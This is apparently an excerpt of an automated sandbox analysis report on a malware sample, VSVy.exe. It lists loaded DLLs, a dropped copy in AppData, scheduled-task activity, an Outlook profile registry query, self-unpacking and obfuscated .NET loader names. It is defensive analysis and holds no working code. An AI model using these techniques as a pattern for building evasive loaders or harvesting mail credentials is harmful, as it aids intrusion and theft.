Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VSVy.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\VSVy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\VSVy.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\VSVy.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: VSVy.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: VSVy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\VSVy.exe

Unpacked PE file: 0.2.VSVy.exe.4a0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\VSVy.exe

Unpacked PE file: 0.2.VSVy.exe.4a0000.0.unpack

.NET source code contains potential unpacker

Source: 0.2.VSVy.exe.4185da0.4.raw.unpack, RK.cs	.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.VSVy.exe.28a0000.1.raw.unpack, RK.cs	.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, S6q8GFqt3n1GOBenTk.cs	.Net Code: PApoHnCCXQ System.Reflection.Assembly.Load(byte[])
Source: 0.2.VSVy.exe.41a5dc0.5.raw.unpack, RK.cs	.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, S6q8GFqt3n1GOBenTk.cs	.Net Code: PApoHnCCXQ System.Reflection.Assembly.Load(byte[])
Source: 11.2.gJfOOh.exe.3af9540.1.raw.unpack, S6q8GFqt3n1GOBenTk.cs	.Net Code: PApoHnCCXQ System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_0056CE44 push ecx; ret	0_2_0056CF4A
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_0056CF8F push ecx; ret	0_2_0056CF98
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_0056CF89 push ecx; retf	0_2_0056CF8C
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_0056CF71 push ecx; retf	0_2_0056CF86
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_0056CE66 push ecx; ret	0_2_0056CF4A
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_004A20BC push es; iretd	0_2_004A20BD
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_0056CF60 push ecx; retf	0_2_0056CF62
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_004A20B3 push cs; ret	0_2_004A20BB
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_09578BF5 push 69C04589h; ret	0_2_09578BFB
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_0957CA5E push CC095AA3h; iretd	0_2_0957CA75
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_0957BFD0 push CC095AA3h; iretd	0_2_0957CA75
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_095721F8 push 69C04589h; ret	0_2_095721FE
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 0_2_097736CC push ebx; iretd	0_2_097736DA
Source: C:\Users\user\Desktop\VSVy.exe	Code function: 10_2_068E8D3D push es; ret	10_2_068E8D44
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_049D6063 pushfd ; iretd	11_2_049D60BE
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 11_2_04FE79C7 pushfd ; iretd	11_2_04FE79C9
Source: C:\Users\user\AppData\Roaming\gJfOOh.exe	Code function: 16_2_02D99C30 push esp; retf 02E0h	16_2_02D99D55

Source: VSVy.exe	Static PE information: section name: .text entropy: 7.6852612472384925
Source: gJfOOh.exe.0.dr	Static PE information: section name: .text entropy: 7.6852612472384925

Source: 0.2.VSVy.exe.447b420.6.raw.unpack, eUuEe4OrV40VRtn7Np.cs	High entropy of concatenated method names: 'hhMIpnwKYE', 'qqTIwZ6ETF', 'zYbICywveu', 'wbuIOtS61d', 'DwmIvx8pIM', 'wNKI8fkvei', 'qNqIGTVBCO', 'gk7I26duHN', 'ueWIatT680', 'GtpIR3kdEc'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, gcOGR2CVZ5gWDXuqnV.cs	High entropy of concatenated method names: 'JtKjTEJHfo', 'gatj5QdH2S', 'G7KjLIouVo', 'hcyjdafyKF', 'BL6jDC6HJq', 'i9GjgfR4Bw', 'Df3j1Hn7Ry', 'rtojE13tvP', 'hsYjVrRFXi', 'I6FjKcgVPX'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, lurOhwghi3TY9aVipT.cs	High entropy of concatenated method names: 'b9YGEV9Axw', 'KuoGKcAWRy', 'qGQ2kh3Zck', 'wLG2r9ao1a', 'CTKGPtnE0Z', 'WvgGmLbgOf', 'v9AGiZ8v6Z', 'VrYGTxCpgk', 'tnJG5Z6MF6', 'nTGGLPTjIh'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, ac6w5O1eEbbLSHhbcg.cs	High entropy of concatenated method names: 'q5KavWlCbJ', 'W21aGt4oQk', 'uufaa656b8', 'lvqa93DraN', 'FDQatTWb9U', 'z7EahUBJ4R', 'Dispose', 'dHd2UvUO3e', 'SsB2jPQOnV', 'JN22INeixm'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, d9mYAbiG8Tuy8A3ufE.cs	High entropy of concatenated method names: 'CkafC174wm', 'PsIfOVacWy', 'rxJfntClVc', 'QDBfJoQQb7', 'uAPfe527po', 'KjBfSXailh', 'J1vfYpGojP', 'GdZfsDZuj8', 'LSgfFdRHS9', 'IYBfP2Hnnc'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, yeorbijDlEpM0W5tPK.cs	High entropy of concatenated method names: 'Dispose', 'hbLrVSHhbc', 'pNr6JkmuH7', 'yiNAHWbeOx', 'V8brKL0rlp', 'Qdtrz0qUTD', 'ProcessDialogKey', 'wfI6k4bNq7', 'JrG6r1iAtt', 'YXF66RwTNf'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, YYVFxextRxUwTnW85c.cs	High entropy of concatenated method names: 'uBHbyg9CiB', 'JJgbZ3Ey62', 'i3UI3ooS1l', 'WQnIeNXKW9', 'ob7ISVeqnw', 'aNWIMFqt6D', 'LV9IYTyT77', 'WfIIsIcM3G', 'erZIA3h5xQ', 'OWeIFiArVY'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, RkPOokr6VwmXIDrvXG0.cs	High entropy of concatenated method names: 'ToString', 'fgR9C2l0XB', 'GeI9OTYph8', 'r0x9ximCa0', 'gBe9nCD1MY', 'yeV9J76ISo', 'Uvc93Eyp05', 'rU29eTYiPK', 'JgmE5eMbrVxMQiqmuQX', 'Kee6kqM8hD2OEmJEDvd'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, zPWXsvrkcqmULf5tUA8.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oWbRPP2xUL', 'd5bRm2CgyE', 'WxLRiuhuEb', 'rCNRTM3vyS', 'AmaR501ca0', 'UdZRLfPUl1', 'ML8Rd2FeCT'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, g4bNq7VSrG1iAttKXF.cs	High entropy of concatenated method names: 'svuansxNWr', 'IMmaJXH9tT', 'cFBa3NUF03', 'GeUaefLjlC', 'DjUaS89LIc', 'kFpaMBrZ5C', 'VtdaYkyfPw', 'hvXasN1NW6', 'aDJaAua1Jj', 'TIfaF2rS10'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, Ym7FTqrrMHR6DHoFZ8m.cs	High entropy of concatenated method names: 'qDLRKGn7HK', 'sedRzGIIQA', 'cCn9kN2jbS', 'xIg9rYnQhT', 'hIp967R24t', 'ieb9B7sFdy', 'S5C9of0ZxS', 'pjx9X7JbIT', 'tSw9UXBfZb', 'Yme9joHOuy'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, OARC1yL0uWy4BH6F7h.cs	High entropy of concatenated method names: 'ToString', 'TSX8PUuDrc', 'GPU8JIt8d2', 'w8b83YRbkx', 'b4X8e646oP', 'nFm8SKsiCQ', 'pDH8M9aHQa', 'LaC8YaDWBf', 'iNh8s90H3l', 'WhS8AvJGDx'
Source: 0.2.VSVy.exe.447b420.6.raw.unpack, qXKZM5zrBxYMqPeTWi.cs	High entropy of concatenated method names: 'jheRwR8pxG', 'vT9RCNUfpG', 'j9BRONsGfF', 'ycXRnF6FTK', 'U5yRJoNqN5', 'Xr9RekXYI3', 'GOHRSQjZvX', 'mHvRhTjryt', 'sJlRc63jiL', 'R2iRWsANci'
